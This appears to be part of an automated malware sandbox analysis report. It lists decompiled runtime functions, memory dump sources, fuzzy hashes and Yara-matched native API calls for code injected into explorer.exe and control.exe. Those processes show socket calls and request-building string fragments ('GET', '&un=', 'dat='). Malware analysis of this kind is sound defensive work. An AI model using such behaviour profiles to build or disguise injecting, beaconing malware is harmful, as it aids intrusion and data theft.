                                            0x003061c1
                                            0x003061c1
                                            0x003061c2
                                            0x003061c5
                                            0x003061ca
                                            0x003061cf
                                            0x00306261
                                            0x00000000
                                            0x003061d5
                                            0x003061d5
                                            0x003061d5
                                            0x003061db
                                            0x0030620a
                                            0x003061dd
                                            0x003061df
                                            0x003061df
                                            0x00306210
                                            0x00306216
                                            0x00306212
                                            0x00306212
                                            0x00306212
                                            0x0030621b
                                            0x0030621d
                                            0x0030622c
                                            0x00306231
                                            0x00306234
                                            0x0030623e
                                            0x00306247
                                            0x0030624a
                                            0x0030625d
                                            0x00000000
                                            0x0030624c
                                            0x0030624e
                                            0x00306258
                                            0x00306258
                                            0x0030624a
                                            0x003061cf
                                            0x003061bf
                                            0x003061b4
                                            0x003061a7
                                            0x0030619f

                                            APIs
                                              • Part of subcall function 00306290: _memmove.LIBCMT ref: 0030635E
                                            • _memmove.LIBCMT ref: 0030622C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 4104443479-4289949731
                                            • Opcode ID: 8ac9a98f3dd182815e34b067265ce640c087b0711cc0bd14146e75a98681edab
                                            • Instruction ID: 456c32fd3175aca0e0af74aa6c5b3bbcc2091b0472bb209df36a0654b6870fa8
                                            • Opcode Fuzzy Hash: 8ac9a98f3dd182815e34b067265ce640c087b0711cc0bd14146e75a98681edab
                                            • Instruction Fuzzy Hash: C631EA323052149BD7269F5CD8A1A5EB7EDEF94750B204E2EF551CB2C6C771DC1087A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0030FCF8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0030FCF8() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0x334b24;
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0x334b24 = _t3;
				}
				_t4 = E00311C7D(_t3, 4);
				 *0x334b20 = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0x32e398;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0x32e618) {
							break;
						}
						_t4 =  *0x334b20;
					}
					return 0;
				} else {
					 *0x334b24 = _t13;
					_t4 = E00311C7D(_t13, 4);
					 *0x334b20 = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}









                                            0x0030fcf8
                                            0x0030fd00
                                            0x0030fd03
                                            0x0030fd0e
                                            0x0030fd10
                                            0x00000000
                                            0x0030fd10
                                            0x0030fd05
                                            0x0030fd05
                                            0x0030fd12
                                            0x0030fd12
                                            0x0030fd12
                                            0x0030fd1a
                                            0x0030fd1f
                                            0x0030fd28
                                            0x0030fd48
                                            0x0030fd48
                                            0x0030fd4a
                                            0x0030fd4f
                                            0x0030fd4f
                                            0x0030fd52
                                            0x0030fd55
                                            0x0030fd5e
                                            0x00000000
                                            0x00000000
                                            0x0030fd60
                                            0x0030fd60
                                            0x0030fd6a
                                            0x0030fd2a
                                            0x0030fd2d
                                            0x0030fd33
                                            0x0030fd38
                                            0x0030fd41
                                            0x00000000
                                            0x0030fd43
                                            0x0030fd45
                                            0x0030fd47
                                            0x0030fd47
                                            0x0030fd41

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __calloc_crt
                                            • String ID: ;3
                                            • API String ID: 3494438863-1148064220
                                            • Opcode ID: 8ef45223f5d2afe9a01e24cddecf844d7dbee3a1ff1334c5c34645fc2808306f
                                            • Instruction ID: 9a472df4e4a74c7b7665da0ac8836436c0ccdc87ecd4be0a9b7740745e74e6cd
                                            • Opcode Fuzzy Hash: 8ef45223f5d2afe9a01e24cddecf844d7dbee3a1ff1334c5c34645fc2808306f
                                            • Instruction Fuzzy Hash: 6DF062762466119FF73B9B18BCA1BA5B7D8EB58765F100036E200CEDD4E770E84197D8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F6FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E00F6FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00F1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L00F65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L00F65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x00f6fdda
                                            0x00f6fde2
                                            0x00f6fde5
                                            0x00f6fdec
                                            0x00f6fdfa
                                            0x00f6fdff
                                            0x00f6fe0a
                                            0x00f6fe0f
                                            0x00f6fe17
                                            0x00f6fe1e
                                            0x00f6fe19
                                            0x00f6fe19
                                            0x00f6fe19
                                            0x00f6fe20
                                            0x00f6fe21
                                            0x00f6fe22
                                            0x00f6fe25
                                            0x00f6fe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F6FDFA
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00F6FE2B
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00F6FE01
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 0423496c0372498069cd68441515560e51e67e33b11870baaa343b62cb92f5f7
                                            • Instruction ID: 3dce347254e6494bff107e72113266ecc7773609c7199fb656db88caf8123a0f
                                            • Opcode Fuzzy Hash: 0423496c0372498069cd68441515560e51e67e33b11870baaa343b62cb92f5f7
                                            • Instruction Fuzzy Hash: D1F0F632640601BFD6201A45DD02F23BF5AEB44B30F240318F628665E1DA63FC70A7F0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: explorer.exe PID: 3424 Parent PID: 4284 explorer.exeCOMMON

                                            Executed Functions

                                            Function 06C017A2, Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 814networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
                                            • Instruction ID: cb1ed4e7487b55445bcfbdefb9484088f308bdf21288086cc196fb631da55978
                                            • Opcode Fuzzy Hash: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
                                            • Instruction Fuzzy Hash: 38529230618B488BD7A9EF68D4847EAF7E1FB54300F54462ED4AFC7286DE34A649CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06C00A52, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                            • Instruction ID: 4b9743b6a94645805d8562d9a7f6bd422964b985fb2fa6a7be92899a275c8e03
                                            • Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                            • Instruction Fuzzy Hash: 66224870B18E099FDB99DF68C4987AAF7E1FB98305F41022EE45ED3690DB30A551CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06BFE058, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: closesocket
                                            • String ID: clos$esoc$ket
                                            • API String ID: 2781271927-3604069445
                                            • Opcode ID: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
                                            • Instruction ID: f9569810a08d57f4738e1b02e8aab5b57bde9fe199ccb689266b2d17f4f5a048
                                            • Opcode Fuzzy Hash: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
                                            • Instruction Fuzzy Hash: 32F0287011CB484BCBC4EF149089BAAB7F0FB99314F8816BDE44ECB209C77685468707
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06BFDFEC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: closesocket
                                            • String ID: clos$esoc$ket
                                            • API String ID: 2781271927-3604069445
                                            • Opcode ID: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
                                            • Instruction ID: 324647b67cdf9302fd0ac22ac73e7ba1374516da78c8dbe070680acdcb4b150d
                                            • Opcode Fuzzy Hash: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
                                            • Instruction Fuzzy Hash: 3FF0967011CB088FC784DF2894897AAB7E0FB89315F5815ADE84ECB644C77585468703
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06BFDFF2, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: closesocket
                                            • String ID: clos$esoc$ket
                                            • API String ID: 2781271927-3604069445
                                            • Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                            • Instruction ID: d7b60c4486c285eae0494ce371629192ec58c5cf129cf0f8530cc483b6493f7a
                                            • Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                            • Instruction Fuzzy Hash: 06F03A7061CB089FDB84EF18D488B6AB7E0FB89314F58566DF44ECB248C77589468B03
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06BFDF72, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                            • Instruction ID: 9807037dac6838859964b5c147ce2bbc88ef1cdf3be6b0ed3f559e482eb7d10c
                                            • Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                            • Instruction Fuzzy Hash: 0D012170618A0C8FCBC4EF5CE448B55B7E0EB59314F1541AED90DCB266C674C9818BC2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06BFDF6E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
                                            • Instruction ID: 27dab41b9f610085fe7ca10526f6a3312b545c24dfa05730f9e4a3c1a326c40b
                                            • Opcode Fuzzy Hash: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
                                            • Instruction Fuzzy Hash: 42017C70628A0C8FCBC8EF5CE488B55B7E0FB59310F1645AED84DCB266CA74C9858BC1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06BFDDEF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
                                            • Instruction ID: 31d0ba9896e589f6c79ad5de3d127f1e19f50aaf0d111591a9829f03f8239df6
                                            • Opcode Fuzzy Hash: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
                                            • Instruction Fuzzy Hash: B91170706187488FCB84DF18E444B40BBE0EF5A314F1545EED44DCB276C2B4C9468B82
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06BFDEF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                            • Instruction ID: 0d30b1b068be8854d3467d640f63a9099547015ac3e341fbd9f498274a4f4b3e
                                            • Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                            • Instruction Fuzzy Hash: 80012570518A0C8FDBC8EF5CD488B15B7E0EB58314F1545EED85DCB366C670D8818B81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06BFDDF2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                            • Instruction ID: 24cbd2d041203a01994acc704aeb9410fc854c8cdd11a5fbda54141edea162b9
                                            • Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                            • Instruction Fuzzy Hash: 820121706186088FCB84EF5CD048B55BBE0FB59314F1545ADD45DCB266C7B0C9858B86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 06BF62C9, Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.936382973.0000000006BD0000.00000040.00000001.sdmp, Offset: 06BD0000, based on PE: false
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
                                            • Instruction ID: 5ed0e814c49bf8954a97be58a3c80d7e80182d411005c423a1dcca9135266486
                                            • Opcode Fuzzy Hash: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
                                            • Instruction Fuzzy Hash: 02316DB4A24B09DFDBA4EF6984882A5F3A1FB54300F1442BECE2DC6212DB349458CFD1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Analysis Process: control.exe PID: 6784 Parent PID: 3424 control.exeCOMMON

                                            Executed Functions

                                            Function 02399F1A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02394B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02394B77,007A002E,00000000,00000060,00000000,00000000), ref: 02399F6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 24f00a97893ff52056111d9c5f35da1c2a821cdb97eb9358ddc4761e71d6e4cf
                                            • Instruction ID: b49512e899451516e7e4b518d9c2a78d1ab86015fb6252069b2c99b911df5ef6
                                            • Opcode Fuzzy Hash: 24f00a97893ff52056111d9c5f35da1c2a821cdb97eb9358ddc4761e71d6e4cf
                                            • Instruction Fuzzy Hash: 5101B2B6200108AFCB08CF98DC94EEB37BAAF8C754F158248FA1D97240C630E855CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02399F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02394B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02394B77,007A002E,00000000,00000060,00000000,00000000), ref: 02399F6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: dc5246c2a843db7ea1aa3f171684f76abf15ff60b8ca2ff8d0661709c74d1223
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: C9F0B2B2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0239A0FA, Relevance: 1.6, APIs: 1, Instructions: 51memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02382D11,00002000,00003000,00000004), ref: 0239A139
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 72de64abfe2f88d13de6ae20fdaf00cc6fbdef001a8b628d81de34f762171da9
                                            • Instruction ID: e527ca5596b8faae4bfecb28fcd6af037c06a1226d59496949a163c350ccaed2
                                            • Opcode Fuzzy Hash: 72de64abfe2f88d13de6ae20fdaf00cc6fbdef001a8b628d81de34f762171da9
                                            • Instruction Fuzzy Hash: 4B011AB5600209ABCB14DF98DC80EAB77AEAF88714F148549FD1897341D631E821CBF4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02399FCB, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(02394D32,5EB6522D,FFFFFFFF,023949F1,?,?,02394D32,?,023949F1,FFFFFFFF,5EB6522D,02394D32,?,00000000), ref: 0239A015
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 5c5ea177e98d070748bf6788a9f72652bd66ad62d6c741358b660486c29f9c2e
                                            • Instruction ID: 344b25caf5762608a36b1688a73c2dee505ecd9fc690f10040f31ae289fe0680
                                            • Opcode Fuzzy Hash: 5c5ea177e98d070748bf6788a9f72652bd66ad62d6c741358b660486c29f9c2e
                                            • Instruction Fuzzy Hash: 2BF0A9B6200105ABCB14DF99DC94EEB77A9EF8C354F158649FA1DA7251D630E8118BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02399FD0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(02394D32,5EB6522D,FFFFFFFF,023949F1,?,?,02394D32,?,023949F1,FFFFFFFF,5EB6522D,02394D32,?,00000000), ref: 0239A015
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: 97f40c0c1564d4c0c15dda515d1b0ee6e73968ea148780b375a1ccbb9329828d
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: 75F0A4B2200208ABCB14DF89DC90EEB77ADAF8C754F158249BE1D97241D630E8118BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0239A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02382D11,00002000,00003000,00000004), ref: 0239A139
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: acdc43b30a652ed98bf7dfe7e0340cdcdb3673fe1a1a8e32b97cbc8a6283728c
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: EAF015B2200208ABCB14DF89DC80EAB77ADAF88750F118249BE0897241C630F810CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0239A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(02394D10,?,?,02394D10,00000000,FFFFFFFF), ref: 0239A075
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: e198a79e3bd12812b2bfebc0c25ff20a6defdd0e10a57f08ea3e4b6f67d7070d
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: EAD01776200214ABDB20EB98DC85FA77BADEF48760F154599BA189B242C530FA008BE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1ddf0e196008e78eddfe43bcf86390c0ad3851e2974719cf995a50af67f55a56
                                            • Instruction ID: 25854b0b8d1deee2f8becfdf3e8d12c713dcd7bb91374b2591a424b5721ce167
                                            • Opcode Fuzzy Hash: 1ddf0e196008e78eddfe43bcf86390c0ad3851e2974719cf995a50af67f55a56
                                            • Instruction Fuzzy Hash: 0E9002A5A12000032505B559470490B004697E5395351C026F1006554CD765D8616161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 044795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: aff7b9eb3586ae7aa847cdb1170088fbe3dd3523f5fd2683ae543eeaf690dbe2
                                            • Instruction ID: c339d4c8c97a4b88c6520bad80b0b1d19dddd022c79fe5d5c168e466d476648c
                                            • Opcode Fuzzy Hash: aff7b9eb3586ae7aa847cdb1170088fbe3dd3523f5fd2683ae543eeaf690dbe2
                                            • Instruction Fuzzy Hash: EA9002E1A0300003650571598414A1A400A97F0245B51C026E1005594DC669D8917165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 20380c9e9e146a48e9fc4cef8803ca94619ad961d7871dc607b12598684428df
                                            • Instruction ID: 7a12b67ddab4c685899aa4434969cf76edf15a34fb0a6d2dfa089d28bfa8a8df
                                            • Opcode Fuzzy Hash: 20380c9e9e146a48e9fc4cef8803ca94619ad961d7871dc607b12598684428df
                                            • Instruction Fuzzy Hash: E19002B1A0604842F54071598404E4A001597E0349F51C016E0055698D9769DD55B6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
